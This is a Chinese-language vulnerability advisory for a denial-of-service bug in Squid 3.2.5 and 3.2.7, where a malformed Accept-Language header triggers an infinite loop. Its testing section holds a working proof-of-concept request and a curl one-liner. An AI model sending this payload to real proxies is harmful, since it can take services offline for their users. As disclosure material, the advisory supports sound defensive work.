发布日期:2013-03-05
更新日期:2013-03-07
受影响系统:
Squid Squid 3.2.7
Squid Squid 3.2.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58316
Squid是一个高效的Web缓存及代理程序。
Squid 3.2.5、3.2.7在函数'strHdrAcptLangGetItem()'的实现上存在安全漏洞,此漏洞仅在squid生成错误页面时可以触发。成功利用后可允许远程攻击者造成死循环,触发拒绝服务。该错误仅在squid需要生成错误页面时才会被触发。
<*来源:tytusromekiatomek (tytusromekiatomek@hushmail.com)
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
tytusromekiatomek (tytusromekiatomek@hushmail.com)提供了如下测试方法:
POC (request):
-- cut --
GET :1/foo HTTP/1.1
Accept-Language: ,
-- cut --
e.g : curl -H "Accept-Language: ," :3129/
建议:
--------------------------------------------------------------------------------
厂商补丁:
Squid
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: